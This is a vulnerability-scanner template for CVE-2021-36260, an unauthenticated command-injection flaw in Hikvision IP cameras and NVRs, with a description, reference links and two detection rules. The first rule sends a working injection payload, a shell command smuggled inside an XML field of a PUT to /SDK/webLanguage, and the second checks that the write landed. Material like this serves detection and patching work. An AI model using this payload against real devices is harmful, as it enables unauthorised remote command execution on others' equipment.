A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
PoC代码[已公开]
id: CVE-2021-36260
info:
name: Hikvision IP camera/NVR - Unauthenticated RCE
author: pdteam,gy741
severity: critical
verified: true
description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
reference:
- https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
- https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
- https://nvd.nist.gov/vuln/detail/CVE-2021-36260
- https://github.com/Aiminsun/CVE-2021-36260
tags: cve,cve2021,rce,hikvision
created: 2023/08/09
set:
rand1: randomLowercase(16)
rules:
r1:
request:
method: PUT
path: /SDK/webLanguage
body: |
<?xml version="1.0" encoding="UTF-8"?><language>$(echo {{rand1}}>webLib/x)</language>
expression: response.status == 500 && response.body.bcontains(b"<ResponseStatus")
r2:
request:
method: GET
path: /x
expression: response.status == 200 && response.body.bcontains(bytes(rand1))
expression: r1() && r2()